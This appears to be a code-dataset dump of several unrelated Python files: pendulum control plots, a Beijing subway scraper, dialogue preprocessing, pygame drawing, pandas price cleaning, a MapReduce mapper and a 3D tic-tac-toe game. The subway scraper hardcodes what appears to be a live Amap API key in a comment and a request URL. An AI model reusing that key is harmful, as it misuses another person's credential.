plt.ylabel(r'$\\phi(t)$', fontsize=21, rotation=0)\n\n def control_pendulum_plot(self):\n control_t = np.arange(0, self.max_t, self.dt) + self.control_start_time\n if self.asymptotic_control_on:\n plt.plot(control_t, self.asym_control_phi, 'r--', label=r'$\\phi(t)-Controlled$')\n\n if self.adaptive_control_on:\n plt.plot(control_t, self.adap_control_phi, 'k-.', label=r'$\\phi(t)-Adaptive\\ \\delta$')\n\n def phase_space_plot(self):\n # 2D phase plot\n plt.figure(figsize=[16, 9])\n plt.gca().set_aspect('equal', adjustable='box')\n plt.grid()\n plt.scatter(self.asym_control_phi[0], self.asym_control_dphi[0], c='b', marker='s', label='initial')\n asym_x_range = asym_y_range = adap_x_range = adap_y_range = np.ones(1)\n\n if self.asymptotic_control_on:\n # plot the asymptotic convergence of phi(t)\n plt.plot(self.asym_control_phi, self.asym_control_dphi, 'r--', label='Asymptotic')\n self.phase_space_arrow_plot(self.asym_control_phi, self.asym_control_dphi)\n asym_x_range = np.ptp(self.asym_control_phi, axis=0)\n asym_y_range = np.ptp(self.asym_control_dphi, axis=0)\n\n if self.adaptive_control_on:\n # plot the exponential convergence of phi(t)\n plt.plot(self.adap_control_phi, self.adap_control_dphi, 'k--', label='Adaptive')\n self.phase_space_arrow_plot(self.asym_control_phi, self.asym_control_dphi)\n adap_x_range = np.ptp(self.adap_control_phi, axis=0)\n adap_y_range = np.ptp(self.adap_control_dphi, axis=0)\n\n # r = np.max(np.hstack((adap_y_range, asym_y_range, adap_x_range, asym_x_range))) * 1.2\n # plt.ylim(0 - r / 2, 0 + r / 2)\n # plt.xlim(0 - r / 2, 0 + r / 2)\n r = 2.0\n plt.ylim(0 - r, 0 + r)\n plt.xlim(0 - r, 0 + r)\n\n plt.xlabel(r'$\\phi(t)$', fontsize=21)\n plt.ylabel(r'$\\dot{\\phi}(t)$', fontsize=21, rotation=0)\n plt.legend()\n self.fig_save_and_show('phi_dphi')\n\n def phase_space_arrow_plot(self, phi, dphi):\n # plot 10 arrows for every 100/1000 steps; if the steps < 100, plot just one arrow\n if self.steps < 100:\n num_arrows = 1\n arrow_position_sequence = np.array([int(round(self.steps/2))])\n else:\n num_arrows = 5\n arrow_position_sequence = np.array([int(step) for step in np.linspace(0, self.steps - 2, num_arrows)])\n\n for num, pos in enumerate(arrow_position_sequence[1:]):\n plt.annotate('', xy=(phi[pos+1], dphi[pos+1]), xytext=(phi[pos], dphi[pos]),\n arrowprops={'arrowstyle': '->, head_width=.5, head_length=1.5', 'color': 'r'}, va='center')\n\n def phi_dphi_time_plot(self):\n # Debug use\n if self.asymptotic_control_on:\n plt.figure(figsize=[16, 9])\n plt.grid()\n plt.plot(self.time, self.asym_control_phi, 'r', label=r'$\\phi(t)$')\n plt.plot(self.time, self.asym_control_dphi, 'b', label=r'$\\dot{\\phi}(t)$')\n plt.xlabel(r'$t$', size=21)\n plt.legend()\n self.fig_save_and_show('phi_dphi_time_asym')\n\n if self.adaptive_control_on:\n plt.figure(figsize=[16, 9])\n plt.grid()\n plt.plot(self.time, self.adap_control_phi, 'r', label=r'$\\phi(t)$')\n plt.plot(self.time, self.adap_control_dphi, 'b', label=r'$\\dot{\\phi}(t)$')\n plt.xlabel(r'$t$', size=21)\n plt.legend()\n self.fig_save_and_show('phi_dphi_time_adap')\n\n def energy_plot(self):\n plt.figure(figsize=[16, 9])\n plt.grid()\n if self.asymptotic_control_on:\n energy_asym = 1/2 * self.m * ((self.asym_control_L * self.asym_control_dphi)**2 + self.asym_control_dL**2) \\\n + self.m * self.g * (-np.cos(self.asym_control_phi) * self.asym_control_L + self.l0)\n plt.plot(self.time, energy_asym, 'r', label=r'$V$ - Asymptotic')\n\n if self.adaptive_control_on:\n energy_adap = 1/2 * ((self.adap_control_length * self.adap_control_dphi)**2 + self.adap_control_dlength**2) \\\n + self.g*self.adap_control_length*(1-np.cos(self.adap_control_phi))\n plt.plot(self.time, energy_adap, 'k--', label=r'$V$ - Adaptive')\n plt.xlabel(r'$t$', size=21)\n plt.ylabel(r'$V(t)$', size=21, rotation=0, labelpad=22)\n plt.legend()\n self.fig_save_and_show('energy')\n\n def frequency_plot(self):\n plt.figure(figsize=[16, 9])\n plt.grid()\n if self.asymptotic_control_on:\n omega_asym = np.sqrt(self.g / self.asym_control_L - (self.asym_control_dL/self.asym_control_L)**2)\n plt.plot(self.time, omega_asym, 'r', label=r'$\\omega$ - Asymptotic')\n\n if self.adaptive_control_on:\n omega_adap = np.sqrt(self.g / self.adap_control_length - (self.adap_control_dlength/self.adap_control_length)**2)\n plt.plot(self.time, omega_adap, 'k--', label=r'$\\omega$- Adaptive')\n plt.xlabel(r'$t$', size=21)\n plt.ylabel(r'$\\omega(t)$', size=21, rotation=0)\n plt.legend()\n self.fig_save_and_show('frequency')\n\n def length_plot(self):\n # length plot\n plt.figure(figsize=[16, 9])\n plt.grid()\n\n # L plot\n if self.asymptotic_control_on:\n # plot the asymptotic pendulum length\n entire_asym_length = np.hstack((self.l0 * np.ones(self.prev_length), self.asym_control_L))\n plt.plot(self.entire_t, entire_asym_length, 'r--', label='Asymptotic')\n\n if self.adaptive_control_on:\n # plot the adaptive pendulum length\n entire_adap_length = np.hstack((self.l0 * np.ones(self.prev_length), self.adap_control_length))\n plt.plot(self.entire_t, entire_adap_length, 'k-.', label='Adaptive')\n plt.xlabel(r'$t$', fontsize=21)\n plt.ylabel(r'$\\frac{L(t)}{L_0}$', fontsize=21, rotation=0, labelpad=18)\n plt.legend()\n self.fig_save_and_show('length')\n\n # dL plot\n plt.figure(figsize=[16, 9])\n plt.grid()\n\n if self.asymptotic_control_on:\n # plot the asymptotic pendulum dlength\n entire_asym_dlength = np.hstack((np.zeros(self.prev_length), self.asym_control_dL))\n plt.plot(self.entire_t, entire_asym_dlength, 'r--', label='Asymptotic')\n if self.adaptive_control_on:\n # plot the adaptive pendulum length\n entire_adap_dlength = np.hstack((np.zeros(self.prev_length), self.adap_control_dlength))\n plt.plot(self.entire_t, entire_adap_dlength, 'k-.', label='Adaptive')\n plt.xlabel(r'$t$', fontsize=21)\n plt.ylabel(r'$\\dot{L}(t)$', fontsize=21, rotation=0, labelpad=18)\n plt.legend()\n self.fig_save_and_show('dlength')\n\n def delta_plot(self):\n plt.figure(figsize=[16, 9])\n plt.grid()\n\n if self.asymptotic_control_on:\n # plot the asymptotic delta (const)\n entire_asym_delta = self.delta_asymptotic * np.ones(self.entire_t.shape[0])\n plt.plot(self.entire_t, entire_asym_delta, 'r--', label='Asymptotic')\n\n if self.adaptive_control_on:\n entire_adap_delta = np.hstack((np.zeros(self.prev_length), self.adap_delta_sequence))\n plt.plot(self.entire_t, entire_adap_delta, 'k-.', label='Adaptive')\n plt.legend()\n plt.xlabel(r'$t$', fontsize=21)\n plt.ylabel(r'$\\delta(t)$', fontsize=21, rotation=0)\n self.fig_save_and_show('delta')\n\n def fig_save_and_show(self, name):\n if self.save_fig:\n name = os.path.join(self.IMG_PATH, name) + self.format_fig\n plt.savefig(name, format=self.format_fig[1:], dpi=300)\n if self.show_fig:\n plt.show()\n\n def data_saver(self):\n data = {\n 'asym_phi': self.asym_control_phi,\n 'asym_dphi': self.asym_control_dphi,\n 'asym_L': self.asym_control_L,\n 'asym_dL': self.asym_control_dL\n }\n io.savemat('pendulum_data.mat', data)\n\n\nif __name__ == \"__main__\":\n # T: total control time\n T = 10\n dt = 0.02\n g = 9.8\n m = 1\n l = 1\n\n # t_length: time length before control starts\n t_length = dt\n t = np.arange(0, t_length, dt)\n\n # 1st: simple sin wave\n # signal = {\n # 'phi': a * np.sin(w0 * t),\n # 'dphi': a * w0 * np.cos(w0 * t),\n # }\n\n signal = {\n 'phi': -2 * np.ones(1),\n 'dphi': 3 * np.ones(1),\n }\n\n properties = {\n 'm': m,\n 'max_t': T,\n 'dt': dt,\n 'adaptive_mode': False,\n 'delta_adaptive_const': .15,\n 'asymptotic_mode': True,\n 'delta_asymptotic_const': .05,\n 'l0': l,\n 'constrain_L': True,\n 'Ldotmax': 5,\n 'Ldotmin': -5,\n 'Lmax': 1.5,\n 'Lmin': 0.5,\n 'g': g,\n 'plot': True,\n 'save_fig': True,\n 'show_fig': False,\n 'save_data': False,\n }\n # ================\n pendu = Pendulum(signal, properties)\n pendu.main()\n","repo_name":"kimukook/variable_length_oscillating_pendulum","sub_path":"pendulum.py","file_name":"pendulum.py","file_ext":"py","file_size_in_byte":25318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42417943480","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nheader={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'}\r\n# 根据request的url得到soup\r\ndef get_page_content(request_url):\r\n #得到页面的内容\r\n html = requests.get(request_url, headers = header, timeout = 10)\r\n content = html.text\r\n print(content)\r\n soup = BeautifulSoup(content, 'html.parser', from_encoding = 'utf-8')\r\n return soup\r\nif __name__== '__main__':\r\n request_url = 'https://ditie.mapbar.com/beijing_line/'\r\n soup = get_page_content(request_url)\r\n \r\n df = pd.DataFrame(columns = ['name', 'site'])\r\n subways = soup.find_all('div', class_ = 'station')\r\n for subway in subways:\r\n route_name = subway.find('strong', class_ = 'bolder').text\r\n routes = subway.find('ul')\r\n routes = routes.find_all('a')\r\n \r\n #对于所有route都保存name\r\n for route in routes:\r\n temp = {'name' : route.text, 'site': route_name}\r\n df = df.append(temp, ignore_index = True)\r\n \r\n df['city'] = '北京'\r\n print(df)\r\n df.to_csv('subway.csv',index = False, encoding = 'utf-8')\r\n\r\n#使用高德API\r\nimport re\r\n#通过keyword,city得到指定location\r\n#老师在课上给的链接失效,自己重新申请了api的key = b1d4267a269c108cb148f1b95183890c\r\ndef get_location(keyword, city):\r\n request_url = 'http://restapi.amap.com/v3/place/text?key=b1d4267a269c108cb148f1b95183890c&keywords='+ keyword + '&types=&city=' + city + '&children=1&offset=1&page=1&extensions=all'\r\n data = requests.get(request_url, headers = header, timeout = 10)\r\n data.encoding = 'utf-8'\r\n data = data.text\r\n #后面多了一个?表示懒惰模式\r\n #.*具有贪婪模式,匹配到不能匹配未知\r\n #。*?取消贪婪,一个匹配以后,就继续后面的正则\r\n pattern = 'location\":\"(.*?),(.*?)\"'\r\n #得到经纬度\r\n result = re.findall(pattern, data)\r\n\r\n try:\r\n return result[0][0], result[0][1]\r\n except:\r\n return get_location(keyword.replace('站',''), city)\r\n\r\nif __name__ == '__main__':\r\n df = pd.read_csv('./subway.csv', index_col = None)\r\n print(df.head())\r\n \r\n # df['longtitude'], df['latitude'] = None, None\r\n \r\n # for index, row in df.iterrows():\r\n # name, city = row['name'], row['city']\r\n # longtitude, latitude = get_location(name, city) \r\n # df.iloc[index]['longtitude'] = longtitude\r\n # df.iloc[index]['latitude'] = latitude\r\n # print(longtitude, latitude)\r\n # df.to_csv('subway.csv', index = False)\r\n \r\n longtitudes = []\r\n latitudes = []\r\n for index, row in df.iterrows():\r\n name, city = row['name'], row['city']\r\n longtitude, latitude = get_location(name, city) \r\n longtitudes.append(longtitude)\r\n latitudes.append(latitude)\r\n longtitudes = pd.Series(longtitudes)\r\n latitudes = pd.Series(latitudes)\r\n df['longtitude'] = longtitudes\r\n df['latitude'] = latitudes\r\n df.to_csv('subway.csv', index = False)\r\n df.head()","repo_name":"JadenQ/Gaode_Map_subway_station_Dijkstra","sub_path":"preprocessing_location.py","file_name":"preprocessing_location.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"47805314172","text":"# maluuba\r\nimport re\r\nimport numpy as np\r\n\r\ndef preprocess():\r\n\tcorrect = dict()\r\n\tfor line in open('map.tsv', encoding='utf-8'):\r\n\t\ta, b = line.strip('\\n').split('\\t')\r\n\t\tcorrect[a.lower().strip()] = b.lower().strip()\r\n\r\n\tlines = []\r\n\tn = 0\r\n\tfor line in open(DIR+'/raw.txt', encoding='utf-8'):\r\n\t\tline = line.strip('\\n').replace(\"' \",\" '\")\r\n\t\tturns = []\r\n\t\tfor turn in line.split('\\t'):\r\n\t\t\tturn = re.sub(r\"[^A-Za-z0-9():,\\.!?' ]\", \"\", turn)\r\n\t\t\taa = turn.split()\r\n\t\t\tbb = []\r\n\t\t\tfor a in aa:\r\n\t\t\t\tbb.append(correct.get(a, a))\r\n\t\t\tturns.append(' '.join(bb))\r\n\t\tlines.append('\\t'.join(turns))\r\n\t\tn += 1\r\n\t\tif n%1e3 == 0:\r\n\t\t\tprint('processed %ik'%(n/1e3))\r\n\r\n\twith open(DIR+'/cleaned.txt', 'w', encoding='utf-8') as f:\r\n\t\tf.write('\\n'.join(lines))\r\n\r\n\r\ndef load_vocab():\r\n\ti = 0\r\n\twordtoix = dict()\r\n\tixtoword = dict()\r\n\tfor word in open(DIR+'/vocab.txt'):\r\n\t\tword = word.strip('\\n')\r\n\t\twordtoix[word] = i\r\n\t\tixtoword[i] = word\r\n\t\ti += 1\r\n\treturn ixtoword, wordtoix\r\n\r\n\r\ndef compress():\r\n\timport cPickle\r\n\t\r\n\tx = []\r\n\tloadpath = DIR + '/cleaned.txt'\r\n\tprint('reading '+loadpath)\r\n\twith open(loadpath, 'rb') as f:\r\n\t\tfor line in f:\r\n\t\t\tx.append(line.strip('\\n').strip())\r\n\r\n\tn = len(x)\r\n\tprint('shuffling %i lines'%n)\r\n\tii = list(range(n))\r\n\tnp.random.seed(9)\r\n\tnp.random.shuffle(ii)\r\n\r\n\tprint('splitting...')\r\n\tsent = []\r\n\tii_picked = []\r\n\tfor i in ii:\r\n\t\tline = x[i].split('\\t')\r\n\t\tif len(line) == TURNS and all([len(z)= 300):\n drawCircle(win, p1, 30, \"red\", \"black\")\n elif (p1.getY() >= 300) and (p1.getX() < 300):\n drawCircle(win, p1, 30, \"\", \"blue\")\n else:\n drawCircle(win, p1, 30, \"blue\", \"black\")\n \ndef circles2():\n win = GraphWin(\"circles\", 600, 600)\n for vertical in range(450, 571, 60):\n for horizontal in range(30, 571, 60):\n p1 = win.getMouse()\n centers = Point(horizontal, vertical)\n if (p1.getY() < 300) and (p1.getX() < 300):\n drawCircle(win, centers, 30, \"\", \"red\")\n elif (p1.getY() < 300) and (p1.getX() >= 300):\n drawCircle(win, centers, 30, \"red\", \"black\")\n elif (p1.getY() >= 300) and (p1.getX() < 300):\n drawCircle(win, centers, 30, \"\", \"blue\")\n else:\n drawCircle(win, centers, 30, \"blue\", \"black\")","repo_name":"up816571/CodeArchive","sub_path":"Python/Test3.py","file_name":"Test3.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8799776254","text":"import pandas as pd\nimport numpy as np\n\ndef time_frame_getter(data: pd.DataFrame, time_frame: str) -> pd.DataFrame:\n \"\"\"\n Function for turning 'daily' datasets into either 'weekly' or 'monthly'.\n\n Args:\n data (pd.DataFrame): pandas DataFrame that has column 'close'\n time_frame (str): Either 'W-FRI' for weekly or 'M' for monthly\n\n Returns:\n pd.DataFrame: Returns pandas DataFrame with the specified time_frame.\n \"\"\"\n\n return data.resample(time_frame).ohlc()\n\n\ndef nan_handler(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Handles nan values in a price-dataframe. Takes average, closing price, forward fill and lastly backward fill if necessary\n\n Args:\n df (pd.DataFrame): dataframe that has columns 'close', 'high', 'low', 'open'\n\n Returns:\n [pd.DataFrame]: dataframe without nan values\n \"\"\"\n bool = (df['high'].notna()) & (df['open'].isna()) & (df['low'].notna())\n df.loc[bool, 'open'] = (df.loc[bool, 'high'] + df.loc[bool, 'low'])/2\n for label in ['open', 'low', 'high']:\n df.loc[(df[f'{label}'].isna()) & (df['close'].notna()), f'{label}'] = df.loc[(df[f'{label}'].isna()) & (df['close'].notna()), 'close']\n return df.fillna(method='ffill').fillna(method='bfill')\n\ndef zero_handler(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Handles zero-values that can be interpreted as nan-values in a price-dataframe.\n\n Args:\n df (pd.DataFrame): dataframe that has columns 'close', 'high', 'low', 'open'\n\n Returns:\n [pd.DataFrame]: df that does not have any zero-values where it should not.\n \"\"\"\n bool = (df['high'] != 0) & (df['open'] == 0) & (df['low'] != 0)\n df.loc[bool, 'open'] = (df.loc[bool, 'high'] + df.loc[bool, 'low'])/2\n for label in ['open', 'low', 'high']:\n df.loc[(df[f'{label}'] == 0) & (df['close'] != 0), f'{label}'] = df.loc[(df[f'{label}'] == 0) & (df['close'] != 0), 'close']\n if (df[f'{label}'] == 0).sum() > 0:\n df.loc[(df[f'{label}'] == 0), f'{label}'] = df.loc[(df[f'{label}'] == 0), f'{label}'].replace(0, np.nan).fillna(method='ffill').fillna(method='bfill')\n return df","repo_name":"Erkiish/KEX-","sub_path":"Data/Data_Cleaning.py","file_name":"Data_Cleaning.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22407232715","text":"import os\nfrom typing import Tuple\n\n\nclass BasePreprocessingClass:\n def __init__(self) -> None:\n pass\n\n @staticmethod\n def _read_csv(path: str):\n import pandas as pd\n return pd.read_csv(path)\n\n @staticmethod\n def _get_lists(src: str, filetype: str = \"jpg\") -> Tuple[list, list]:\n import glob\n images, categories = [], []\n\n for cat in glob.glob(src + \"/*\"):\n image_list = glob.glob(cat + f\"/*.{filetype}\")\n cat_list = [os.path.basename(cat)] * len(image_list)\n\n images += glob.glob(cat + f\"/*.{filetype}\")\n categories += cat_list\n\n return images, categories\n\n @staticmethod\n def _get_lists_with_annotations(image_src: str, annotations_src: str,\n image_type=\"jpg\", annotations_type=\"xml\"):\n import glob\n\n images, categories, annotations = [], [], []\n\n for cat in glob.glob(image_src + \"/*\"):\n images += sorted(glob.glob(cat + f\"/*.{image_type}\"))\n categories += [os.path.basename(cat)] * len(glob.glob(cat + f\"/*.{image_type}\"))\n\n for annot in glob.glob(annotations_src + \"/*\"):\n if annotations_type == \"\":\n annotations += sorted(glob.glob(annot + \"/*\"))\n else:\n annotations += sorted(glob.glob(annot + f\"/*.{annotations_type}\"))\n\n return images, categories, annotations\n\n @staticmethod\n def _get_max_threads():\n return int(os.popen('grep -c cores /proc/cpuinfo').read())\n\n def _check_num_threads(self, n: int):\n if n == -1:\n n = self._get_max_threads()\n else:\n assert n <= self._get_max_threads(), \"Number of Threads must be less than {}\".format(\n self._get_max_threads())\n assert n > 0, \"Number of threads should be at least 1\"\n\n return n\n","repo_name":"RJaikanth/torch-cv","sub_path":"torchcv/preprocessing/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2326923229","text":"'''\nTo parse h-data files\n'''\n\nimport os\nimport matplotlib.pyplot as plt\n\nadvFracs = [0.25,0.33]\nprocs = [5.0,7.5]\nzValues = [10, 15, 20]\ncvals = [x for x in range(100,1,-5)]\n\ndef parseFileZ(fileName, resultData):\n\tif os.path.exists(fileName):\n\t\tfile = open(fileName, \"r\")\n\t\tdata = file.readlines()\n\n\t\tfor dataItem in data:\n\t\t\tinfo = dataItem.split(\" \")\n\t\t\tadvFrac = float(info[0])\n\t\t\ttau = float(info[1])\n\t\t\tzList = info[2].split(\",\")\n\t\t\tzDict = {}\n\t\t\tfor zItem in zList:\n\t\t\t\tcontent = zItem.split(\":\")\n\t\t\t\tkey = int(content[0])\n\t\t\t\tvalue = float(content[1])\n\t\t\t\tzDict[key]=value\n\t\t\t\n\t\t\tif advFrac not in resultData:\n\t\t\t\tresultData[advFrac] = {}\n\t\t\tresultData[advFrac][tau]=zDict\n\telse:\n\t\tprint(fileName,\" file not found!!\")\n\ndef parseFileH(fileName, resultData):\n\tif os.path.exists(fileName):\n\t\tfile = open(fileName, \"r\")\n\t\tdata = file.readlines()\n\n\t\tfor dataItem in data:\n\t\t\tinfo = dataItem.split(\" \")\n\t\t\ttau = float(info[0])\n\t\t\tzeta = int(info[1])\n\t\t\tprobList = info[2].split(\",\")\n\t\t\tprobs = {}\n\t\t\tfor prob in probList:\n\t\t\t\tcontent = prob.split(\":\")\n\t\t\t\tkey = int(content[0])\n\t\t\t\tvalue = float(content[1])\n\t\t\t\tprobs[key]=value\n\n\t\t\tif tau not in resultData:\n\t\t\t\tresultData[tau]={}\n\t\t\tprint(tau,zeta)\n\t\t\tresultData[tau][zeta] = probs\n\telse:\n\t\tprint(fileName,\" file not found!!\")\n\n\nfileName = os.environ[\"HOME\"]+\"/EVD-Expt/scripts/z-data-min\"\nresultDataZ = {}\nfilez = open(\"z-data.csv\", \"w+\")\nfilez.write(\"c,25-50,25-75,33-50,33-75\\n\")\n\nparseFileZ(fileName, resultDataZ)\nfor c in cvals:\n\tfilez.write(str(c))\n\tfor tau in procs:\n\t\tfor adv in advFracs:\n\t\t\tif c not in resultDataZ[adv][tau]:\n\t\t\t\tfilez.write(\",\")\n\t\t\telse:\n\t\t\t\tfilez.write(\",\"+str(resultDataZ[adv][tau][c]))\n\tfilez.write(\"\\n\")\nexit()\n\ndirPath = os.environ[\"HOME\"]+\"/EVD-Expt/scripts/\"\nfileNames = ['h-data']\nresultDataH = {}\nfor file in fileNames:\n\tfilePath = dirPath+file\n\tparseFileH(filePath, resultDataH)\n\nfile = open(\"h-data.csv\", \"w+\")\nfile.write(\"c,10-75,15-75,20-75\\n\")\nproc = 7.5 \n\nfor c in cvals:\n\tfile.write(str(c))\n\tfor z in zValues:\n\t\tfile.write(\",\"+str(resultDataH[proc][z][c]))\n\tfile.write(\"\\n\")\n\n","repo_name":"nitinawathare/EVDExperimentSetup","sub_path":"scripts/hDataParse.py","file_name":"hDataParse.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35144310087","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"mapper.py\"\"\"\nimport sys\n\n\"\"\"\nExample of matrix-vector multiplication:\n\nM = [[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]]\n\nv.T = [[1],\n [1], \n [1]]\n\nM * v = [6, 15, 24]\n\nM[i][j] * v[j]\n\nExample data for Map Reduce:\n1 0 4\n0 0 1\n1 1 2\n2 2 1\n0 2 10\n1 2 6\n0 1 2\n2 1 8\n2 0 5\n*\n1 2 3\n=\n35 26 24\n\"\"\"\n\n\ndef main():\n \"\"\"\n Processing lines in format:\n key: value (i j mij)\n\n key: list(int, int)\n i (int): index of a row of matrix\n j (int): index of a column of matrix\n\n value: int\n mij: value of a matrix element\n \"\"\"\n\n \"\"\"\n In this basic algorithm the vector is supposed to be \n loaded into the memory. For simplicity we hardcode it here.\n \"\"\"\n v = [3, 5, 5, 0, 9, 0, 8, 2, 8, 4, 1, 6, 9, 1, 7, 5, 8, 4, 4, 6]\n\n for line in sys.stdin:\n line = line.strip()\n data = line.split()\n\n i, j = int(data[0]), int(data[1])\n mij = float(data[2])\n\n key = i\n value = mij * v[j]\n\n print(f'{key}: {value}')\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"vseredovych/BigData","sub_path":"matrix-vector-multiplication/hadoop/simple/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39391919440","text":"import pygame\nfrom math import *\nimport struct\nimport sys\nimport time\nimport random\nimport threading\n\nimport pg3d\nimport gui\nimport game\n\n\ndef mainMenu():\n pass\n \ndef runGame(screen, ttt, pfont, bfont, cam): #ttt is the board object\n motionMatrix = { # 1 = in direction, -1 opposite direction, 0 = no motion\n \"forward\": 0,\n \"lateral\": 0,\n \"vertical\": 0,\n \"rotational\": 0\n }\n \n mspeeed = 2\n \n blist = []\n \n colors = [(230,230,230),(200,200,200),(170,170,170),(140,140,140)]\n \n space = 20\n for cz in range(0, 4):\n for cy in range(0, 4):\n for cx in range(0, 4):\n if (cy) % 2 == 0:\n if (cy + cz + cx) % 2 == 0:\n color = colors[0]\n else:\n color = colors[1]\n else:\n if (cy + cz + cx) % 2 == 0:\n color = colors[2]\n else:\n color = colors[3]\n blist.append(game.cell(pg3d.point(cx * space, cy * space, cz * space), 10, color, (cx + cy * 4 + cz * 16)))\n \n light = []\n \n #cam = pg3d.camera(pg3d.point(0,0, -75), [0,0,0], pg3d.point(0,0,1000)) #camera object\n s = pg3d.scene(screen, cam, blist, light)\n \n fps = 0\n \n #usernum = 0\n locked = True\n run = True\n winner = None\n \n def doBotLogic():\n nonlocal run\n nonlocal winner\n \n while run:\n time.sleep(0.1)\n if ttt.currentPlayer.type == 1 and winner == None: #if it is a bot's turn\n cellNum = ttt.currentPlayer.doBlockingMove()\n blist[cellNum].occupied = True\n blist[cellNum].changeColor(ttt.currentPlayer.color)\n \n if ttt.testWin():\n winner = ttt.currentPlayer\n \n ttt.gotoNextPlayer()\n \n if ttt.boardstate == 0xffffffffffffffff and winner == None:\n winner = False\n \n logicThread = threading.Thread(target = doBotLogic)\n logicThread.start()\n while run == True:\n startloop = time.time()\n \n mxcenter = int(screen.get_width()/2)\n mycenter = int(screen.get_height()/2)\n \n if locked:\n pygame.mouse.set_pos(mxcenter,mycenter)\n \n m = pygame.mouse.get_rel()\n \n if m[0] != 0 and abs(m[0]) < 300: #if the mouse moved, move camera\n cam.orientation[1] -= radians(m[0]/10)\n if m[1] != 0 and abs(m[1]) < 300:\n cam.orientation[0] -= radians(m[1]/10)\n \n for event in pygame.event.get(): #pygame event detection\n if event.type == pygame.QUIT:\n run = False\n sys.exit(0)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n locked = False\n pygame.mouse.set_visible(True)\n pygame.event.set_grab(False)\n \n if event.key == pygame.K_SPACE and winner != None:\n run = False\n \n if event.key == pygame.K_w:\n motionMatrix[\"forward\"] = 1 * mspeeed\n elif event.key == pygame.K_s:\n motionMatrix[\"forward\"] = -1 * mspeeed\n elif event.key == pygame.K_a:\n motionMatrix[\"lateral\"] = 1 * mspeeed\n elif event.key == pygame.K_d:\n motionMatrix[\"lateral\"] = -1 * mspeeed\n elif event.key == pygame.K_r:\n motionMatrix[\"vertical\"] = -1 * mspeeed\n elif event.key == pygame.K_f:\n motionMatrix[\"vertical\"] = 1 * mspeeed\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_w:\n motionMatrix[\"forward\"] = 0\n elif event.key == pygame.K_s:\n motionMatrix[\"forward\"] = 0\n elif event.key == pygame.K_a:\n motionMatrix[\"lateral\"] = 0\n elif event.key == pygame.K_d:\n motionMatrix[\"lateral\"] = 0\n elif event.key == pygame.K_r:\n motionMatrix[\"vertical\"] = 0\n elif event.key == pygame.K_f:\n motionMatrix[\"vertical\"] = 0\n \n if event.type == pygame.MOUSEBUTTONDOWN:\n if locked and winner == None:\n plist = []\n \n for p in s.polygons: #get closest polygon to mouse\n if p.insidePolygon2D(s.camera, mxcenter, mycenter, (mxcenter,mycenter)):\n plist.append(p)\n \n plist.sort(key = lambda x: x.getDistance(s.camera))\n \n if plist and ttt.currentPlayer.type == 0: #if it is a human's turn\n #validmove = ttt.makeMove(usernum, plist[0].parent.numToBin())\n validmove = ttt.currentPlayer.makeMove(plist[0].parent.numToBin())\n \n if validmove:\n plist[0].parent.changeColor(ttt.currentPlayer.color)\n plist[0].parent.occupied = True\n \n if ttt.testWin():\n winner = ttt.currentPlayer\n \n #print(ttt.currentPlayer.getWinningSequences(2))\n ttt.gotoNextPlayer()\n \n else:\n locked = True\n pygame.mouse.set_visible(False)\n pygame.event.set_grab(True)\n \n if ttt.boardstate == 0xffffffffffffffff and winner == None:\n winner = False\n \n #apply camera translation\n s.camera.position.z += motionMatrix[\"forward\"] * cos(cam.orientation[1])\n s.camera.position.x += motionMatrix[\"forward\"] * sin(cam.orientation[1])\n s.camera.position.y -= motionMatrix[\"forward\"] * sin(cam.orientation[0])\n s.camera.position.x += motionMatrix[\"lateral\"] * sin(cam.orientation[1] + radians(90))\n s.camera.position.z += motionMatrix[\"lateral\"] * cos(cam.orientation[1] + radians(90))\n s.camera.position.y += motionMatrix[\"vertical\"]\n \n screen.fill((0,0,0)) #clear for next frame\n \n s.drawPaintedRaster(False) #draw polygons in reverse depth order\n \n frames = pfont.render(\"{} fps\".format(round(fps,1)),True, (255,255,255))\n \n if winner == None:\n toptext = bfont.render(\"{}'s Turn\".format(ttt.currentPlayer.name), True, ttt.currentPlayer.color)\n else:\n if winner == False:\n toptext = bfont.render(\"Draw\", True, (255, 255, 255))\n else:\n toptext = bfont.render(\"{} Wins!\".format(winner.name), True, winner.color)\n \n bottomtext = bfont.render(\"Press SPACE to Continue\", True, (255, 255, 255))\n brect = bottomtext.get_rect(center = (mxcenter, screen.get_height() - 25))\n screen.blit(bottomtext, brect)\n \n trect = toptext.get_rect(center = (mxcenter, 25))\n screen.blit(frames, (10, 10))\n screen.blit(toptext, trect)\n \n #draw crosshair\n chsize = 15\n pygame.draw.line(screen, (255, 255, 255), (mxcenter - chsize, mycenter), (mxcenter + chsize, mycenter), 1)\n pygame.draw.line(screen, (255, 255, 255), (mxcenter, mycenter - chsize), (mxcenter, mycenter + chsize), 1)\n \n pygame.display.flip()\n \n #print(\"{}ms\".format((time.time() - startloop) * 100))\n fps = 1/(time.time() - startloop + 0.01)\n\ndef main(argv):\n pygame.init()\n \n pygame.display.set_caption(\"3D Tic Tac Toe\")\n screen = 